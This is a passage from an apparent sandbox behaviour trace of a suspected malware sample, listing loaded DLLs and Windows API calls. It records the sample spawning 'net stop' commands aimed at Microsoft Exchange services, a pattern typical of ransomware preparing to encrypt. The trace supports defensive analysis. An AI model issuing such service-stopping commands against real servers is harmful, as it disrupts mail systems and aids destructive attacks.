"\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 12255 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 12256 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 12257 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 12258 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 12259 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 12260 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 12261 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 12262 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 12263 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 12264 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 12265 start_va = 0x7eca0000 end_va = 0x7ed9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eca0000" filename = "" Region: id = 12266 start_va = 0x7edc9000 end_va = 0x7edcbfff entry_point = 0x0 region_type = private name = "private_0x000000007edc9000" filename = "" Region: id = 12267 start_va = 0x180000 end_va = 0x183fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 12268 start_va = 0x2e0000 end_va = 0x2e2fff entry_point = 0x2e0000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 12269 start_va = 0x2f0000 end_va = 0x321fff entry_point = 0x2f0000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 747 os_tid = 0xccc [0140.663] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0140.663] __set_app_type (_Type=0x1) [0140.663] __p__fmode () returned 0x77ac4d6c [0140.663] __p__commode () returned 0x77ac5b1c [0140.663] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0140.663] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0140.663] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.663] GetConsoleOutputCP () returned 0x1b5 [0140.663] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0140.663] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.665] sprintf_s (in: _DstBuf=0x26fd08, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0140.665] setlocale (category=0, locale=".437") returned="English_United States.437" [0140.667] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0140.667] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0140.667] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeServiceHost" [0140.667] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x26fab0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0140.667] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x26faa4 | out: Buffer=0x26faa4*=0x4c7f28) returned 0x0 [0140.667] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x26faa8 | out: Buffer=0x26faa8*=0x4c7f40) returned 0x0 [0140.667] __iob_func () returned 0x77ac1208 [0140.667] _fileno (_File=0x77ac1208) returned 0 [0140.667] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0140.667] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0140.667] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0140.667] _wcsicmp (_String1="config", _String2="stop") returned -16 [0140.667] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0140.667] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0140.667] _wcsicmp (_String1="file", _String2="stop") returned -13 [0140.667] _wcsicmp (_String1="files", _String2="stop") returned -13 [0140.667] _wcsicmp (_String1="group", _String2="stop") returned -12 [0140.667] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0140.667] _wcsicmp (_String1="help", _String2="stop") returned -11 [0140.667] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0140.667] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0140.667] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0140.667] _wcsicmp (_String1="session", _String2="stop") returned -15 [0140.667] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0140.667] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0140.667] _wcsicmp (_String1="share", _String2="stop") returned -12 [0140.667] _wcsicmp (_String1="start", _String2="stop") returned -14 [0140.667] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0140.667] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0140.667] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0140.667] _wcsicmp (_String1="accounts", _String2="MSExchangeServiceHost") returned -12 [0140.667] _wcsicmp (_String1="computer", _String2="MSExchangeServiceHost") returned -10 [0140.667] _wcsicmp (_String1="config", _String2="MSExchangeServiceHost") returned -10 [0140.667] _wcsicmp (_String1="continue", _String2="MSExchangeServiceHost") returned -10 [0140.667] _wcsicmp (_String1="cont", _String2="MSExchangeServiceHost") returned -10 [0140.667] _wcsicmp (_String1="file", _String2="MSExchangeServiceHost") returned -7 [0140.667] _wcsicmp (_String1="files", _String2="MSExchangeServiceHost") returned -7 [0140.667] _wcsicmp (_String1="group", _String2="MSExchangeServiceHost") returned -6 [0140.667] _wcsicmp (_String1="groups", _String2="MSExchangeServiceHost") returned -6 [0140.667] _wcsicmp (_String1="help", _String2="MSExchangeServiceHost") returned -5 [0140.668] _wcsicmp (_String1="helpmsg", _String2="MSExchangeServiceHost") returned -5 [0140.668] _wcsicmp (_String1="localgroup", _String2="MSExchangeServiceHost") returned -1 [0140.668] _wcsicmp (_String1="pause", _String2="MSExchangeServiceHost") returned 3 [0140.668] _wcsicmp (_String1="session", _String2="MSExchangeServiceHost") returned 6 [0140.668] _wcsicmp (_String1="sessions", _String2="MSExchangeServiceHost") returned 6 [0140.668] _wcsicmp (_String1="sess", _String2="MSExchangeServiceHost") returned 6 [0140.668] _wcsicmp (_String1="share", _String2="MSExchangeServiceHost") returned 6 [0140.668] _wcsicmp (_String1="start", _String2="MSExchangeServiceHost") returned 6 [0140.668] _wcsicmp (_String1="stats", _String2="MSExchangeServiceHost") returned 6 [0140.668] _wcsicmp (_String1="statistics", _String2="MSExchangeServiceHost") returned 6 [0140.668] _wcsicmp (_String1="stop", _String2="MSExchangeServiceHost") returned 6 [0140.668] _wcsicmp (_String1="time", _String2="MSExchangeServiceHost") returned 7 [0140.668] _wcsicmp (_String1="user", _String2="MSExchangeServiceHost") returned 8 [0140.668] _wcsicmp (_String1="users", _String2="MSExchangeServiceHost") returned 8 [0140.668] _wcsicmp (_String1="msg", _String2="MSExchangeServiceHost") returned 2 [0140.668] _wcsicmp (_String1="messenger", _String2="MSExchangeServiceHost") returned -14 [0140.668] _wcsicmp (_String1="receiver", _String2="MSExchangeServiceHost") returned 5 [0140.668] _wcsicmp (_String1="rcv", _String2="MSExchangeServiceHost") returned 5 [0140.668] _wcsicmp (_String1="netpopup", _String2="MSExchangeServiceHost") returned 1 [0140.668] _wcsicmp (_String1="redirector", _String2="MSExchangeServiceHost") returned 5 [0140.668] _wcsicmp (_String1="redir", _String2="MSExchangeServiceHost") returned 5 [0140.668] _wcsicmp (_String1="rdr", _String2="MSExchangeServiceHost") returned 5 [0140.668] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeServiceHost") returned 10 [0140.668] _wcsicmp (_String1="work", _String2="MSExchangeServiceHost") returned 10 [0140.668] _wcsicmp (_String1="wksta", _String2="MSExchangeServiceHost") returned 10 [0140.668] _wcsicmp (_String1="prdr", _String2="MSExchangeServiceHost") returned 3 [0140.668] _wcsicmp (_String1="devrdr", _String2="MSExchangeServiceHost") returned -9 [0140.668] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeServiceHost") returned -1 [0140.668] _wcsicmp (_String1="server", _String2="MSExchangeServiceHost") returned 6 [0140.668] _wcsicmp (_String1="svr", _String2="MSExchangeServiceHost") returned 6 [0140.668] _wcsicmp (_String1="srv", _String2="MSExchangeServiceHost") returned 6 [0140.668] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeServiceHost") returned -1 [0140.668] _wcsicmp (_String1="alerter", _String2="MSExchangeServiceHost") returned -12 [0140.668] _wcsicmp (_String1="netlogon", _String2="MSExchangeServiceHost") returned 1 [0140.668] _wcsupr (in: _String="MSExchangeServiceHost" | out: _String="MSEXCHANGESERVICEHOST") returned="MSEXCHANGESERVICEHOST" [0140.668] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4c2610 [0140.670] GetServiceKeyNameW (in: hSCManager=0x4c2610, lpDisplayName="MSEXCHANGESERVICEHOST", lpServiceName=0x10a8cb0, lpcchBuffer=0x26fa1c | out: lpServiceName="", lpcchBuffer=0x26fa1c) returned 0 [0140.671] _wcsicmp (_String1="msg", _String2="MSEXCHANGESERVICEHOST") returned 2 [0140.671] _wcsicmp (_String1="messenger", _String2="MSEXCHANGESERVICEHOST") returned -14 [0140.671] _wcsicmp (_String1="receiver", _String2="MSEXCHANGESERVICEHOST") returned 5 [0140.671] _wcsicmp (_String1="rcv", _String2="MSEXCHANGESERVICEHOST") returned 5 [0140.671] _wcsicmp (_String1="redirector", _String2="MSEXCHANGESERVICEHOST") returned 5 [0140.671] _wcsicmp (_String1="redir", _String2="MSEXCHANGESERVICEHOST") returned 5 [0140.671] _wcsicmp (_String1="rdr", _String2="MSEXCHANGESERVICEHOST") returned 5 [0140.671] _wcsicmp (_String1="workstation", _String2="MSEXCHANGESERVICEHOST") returned 10 [0140.671] _wcsicmp (_String1="work", _String2="MSEXCHANGESERVICEHOST") returned 10 [0140.671] _wcsicmp (_String1="wksta", _String2="MSEXCHANGESERVICEHOST") returned 10 [0140.671] _wcsicmp (_String1="prdr", _String2="MSEXCHANGESERVICEHOST") returned 3 [0140.671] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGESERVICEHOST") returned -9 [0140.671] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGESERVICEHOST") returned -1 [0140.671] _wcsicmp (_String1="server", _String2="MSEXCHANGESERVICEHOST") returned 6 [0140.671] _wcsicmp (_String1="svr", _String2="MSEXCHANGESERVICEHOST") returned 6 [0140.671] _wcsicmp (_String1="srv", _String2="MSEXCHANGESERVICEHOST") returned 6 [0140.671] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGESERVICEHOST") returned -1 [0140.671] _wcsicmp (_String1="alerter", _String2="MSEXCHANGESERVICEHOST") returned -12 [0140.671] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGESERVICEHOST") returned 1 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="WORKSTATION") returned -10 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="LanmanWorkstation") returned 1 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="SERVER") returned -6 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="LanmanServer") returned 1 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="BROWSER") returned 11 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="BROWSER") returned 11 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="MESSENGER") returned 14 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="MESSENGER") returned 14 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="NETRUN") returned -1 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="NETRUN") returned -1 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="SPOOLER") returned -6 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="SPOOLER") returned -6 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="ALERTER") returned 12 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="ALERTER") returned 12 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="NETLOGON") returned -1 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="NETLOGON") returned -1 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="NETPOPUP") returned -1 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="NETPOPUP") returned -1 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="SQLSERVER") returned -6 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="SQLSERVER") returned -6 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="REPLICATOR") returned -5 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="REPLICATOR") returned -5 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="REMOTEBOOT") returned -5 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="REMOTEBOOT") returned -5 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="TIMESOURCE") returned -7 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="TIMESOURCE") returned -7 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="AFP") returned 12 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="AFP") returned 12 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="UPS") returned -8 [0140.671] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="UPS") returned -8 [0140.672] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="XACTSRV") returned -11 [0140.672] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="XACTSRV") returned -11 [0140.672] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="TCPIP") returned -7 [0140.672] _wcsicmp (_String1="MSEXCHANGESERVICEHOST", _String2="TCPIP") returned -7 [0140.672] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x4c3408 [0140.672] OpenServiceW (hSCManager=0x4c3408, lpServiceName="MSEXCHANGESERVICEHOST", dwDesiredAccess=0x84) returned 0x0 [0140.672] GetLastError () returned 0x424 [0140.672] CloseServiceHandle (hSCObject=0x4c3408) returned 1 [0140.672] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0140.672] LoadLibraryW (lpLibFileName="NETMSG") returned 0x2e0000 [0140.673] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x2e0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0140.674] GetFileType (hFile=0x40) returned 0x2 [0140.674] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x26f8b8 | out: lpMode=0x26f8b8) returned 1 [0140.675] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x26f8c4, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x26f8c4*=0x1e) returned 1 [0140.675] GetFileType (hFile=0x40) returned 0x2 [0140.675] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x26f8b8 | out: lpMode=0x26f8b8) returned 1 [0140.675] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f8c4, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x26f8c4*=0x2) returned 1 [0140.675] _ultow (in: _Dest=0x889, _Radix=2554072 | out: _Dest=0x889) returned="2185" [0140.675] FormatMessageW (in: dwFlags=0x2800, lpSource=0x2e0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0140.675] GetFileType (hFile=0x40) returned 0x2 [0140.675] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x26f8a8 | out: lpMode=0x26f8a8) returned 1 [0140.676] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x26f8b4, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x26f8b4*=0x34) returned 1 [0140.676] GetFileType (hFile=0x40) returned 0x2 [0140.676] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x26f8a8 | out: lpMode=0x26f8a8) returned 1 [0140.676] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26f8b4, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x26f8b4*=0x2) returned 1 [0140.676] NetApiBufferFree (Buffer=0x4c7f28) returned 0x0 [0140.676] NetApiBufferFree (Buffer=0x4c7f40) returned 0x0 [0140.676] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeServiceHost" [0140.676] exit (_Code=2) Thread: id = 748 os_tid = 0xcb8 Process: id = "257" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2a500000" os_pid = "0xd5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeSA" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12270 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 12271 start_va = 0xb30000 end_va = 0x4b2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 12272 start_va = 0x4b30000 end_va = 0x4b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 12273 start_va = 0x4b50000 end_va = 0x4b50fff entry_point = 0x0 region_type = private name = "private_0x0000000004b50000" filename = "" Region: id = 12274 start_va = 0x4b60000 end_va = 0x4b73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b60000" filename = "" Region: id = 12275 start_va = 0x4b80000 end_va = 0x4bbffff entry_point = 0x0 region_type = private name = "private_0x0000000004b80000" filename = "" Region: id = 12276 start_va = 0x4bc0000 end_va = 0x4cbffff entry_point = 0x0 region_type = private name = "private_0x0000000004bc0000" filename = "" Region: id = 12277 start_va = 0x4cc0000 end_va = 0x4cc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cc0000" filename = "" Region: id = 12278 start_va = 0x4cd0000 end_va = 0x4cd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cd0000" filename = "" Region: id = 12279 start_va = 0x4ce0000 end_va = 0x4ce1fff entry_point = 0x0 region_type = private name = "private_0x0000000004ce0000" filename = "" Region: id = 12280 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 12281 start_va = 0x7ebf0000 end_va = 0x7ec12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ebf0000" filename = "" Region: id = 12282 start_va = 0x7ec1a000 end_va = 0x7ec1afff entry_point = 0x0 region_type = private name = "private_0x000000007ec1a000" filename = "" Region: id = 12283 start_va = 0x7ec1c000 end_va = 0x7ec1efff entry_point = 0x0 region_type = private name = "private_0x000000007ec1c000" filename = "" Region: id = 12284 start_va = 0x7ec1f000 end_va = 0x7ec1ffff entry_point = 0x0 region_type = private name = "private_0x000000007ec1f000" filename = "" Region: id = 12285 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12286 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 12287 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 12288 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12289 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 12290 start_va = 0x4df0000 end_va = 0x4dfffff entry_point = 0x0 region_type = private name = "private_0x0000000004df0000" filename = "" Region: id = 12291 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 12292 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 12293 start_va = 0x4ed0000 end_va = 0x4fcffff entry_point = 0x0 region_type = private name = "private_0x0000000004ed0000" filename = "" Region: id = 12294 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 12335 start_va = 0x4b30000 end_va = 0x4b3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b30000" filename = "" Region: id = 12336 start_va = 0x4cf0000 end_va = 0x4dadfff entry_point = 0x4cf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12337 start_va = 0x4db0000 end_va = 0x4deffff entry_point = 0x0 region_type = private name = "private_0x0000000004db0000" filename = "" Region: id = 12338 start_va = 0x4e80000 end_va = 0x4e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e80000" filename = "" Region: id = 12339 start_va = 0x4fd0000 end_va = 0x50cffff entry_point = 0x0 region_type = private name = "private_0x0000000004fd0000" filename = "" Region: id = 12340 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 12341 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 12342 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 12343 start_va = 0x7eaf0000 end_va = 0x7ebeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eaf0000" filename = "" Region: id = 12344 start_va = 0x7ec17000 end_va = 0x7ec19fff entry_point = 0x0 region_type = private name = "private_0x000000007ec17000" filename = "" Region: id = 12345 start_va = 0x4b40000 end_va = 0x4b43fff entry_point = 0x0 region_type = private name = "private_0x0000000004b40000" filename = "" Region: id = 12346 start_va = 0x4b50000 end_va = 0x4b53fff entry_point = 0x0 region_type = private name = "private_0x0000000004b50000" filename = "" Region: id = 12347 start_va = 0x50d0000 end_va = 0x5406fff entry_point = 0x50d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 749 os_tid = 0xd20 [0140.842] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0140.842] __set_app_type (_Type=0x1) [0140.842] __p__fmode () returned 0x77ac4d6c [0140.842] __p__commode () returned 0x77ac5b1c [0140.842] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0140.842] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0140.842] GetCurrentThreadId () returned 0xd20 [0140.842] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd20) returned 0x84 [0140.842] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0140.842] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0140.842] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.845] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.845] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4cbfb1c | out: phkResult=0x4cbfb1c*=0x0) returned 0x2 [0140.845] VirtualQuery (in: lpAddress=0x4cbfb23, lpBuffer=0x4cbfad4, dwLength=0x1c | out: lpBuffer=0x4cbfad4*(BaseAddress=0x4cbf000, AllocationBase=0x4bc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.845] VirtualQuery (in: lpAddress=0x4bc0000, lpBuffer=0x4cbfad4, dwLength=0x1c | out: lpBuffer=0x4cbfad4*(BaseAddress=0x4bc0000, AllocationBase=0x4bc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.845] VirtualQuery (in: lpAddress=0x4bc1000, lpBuffer=0x4cbfad4, dwLength=0x1c | out: lpBuffer=0x4cbfad4*(BaseAddress=0x4bc1000, AllocationBase=0x4bc0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.845] VirtualQuery (in: lpAddress=0x4bc3000, 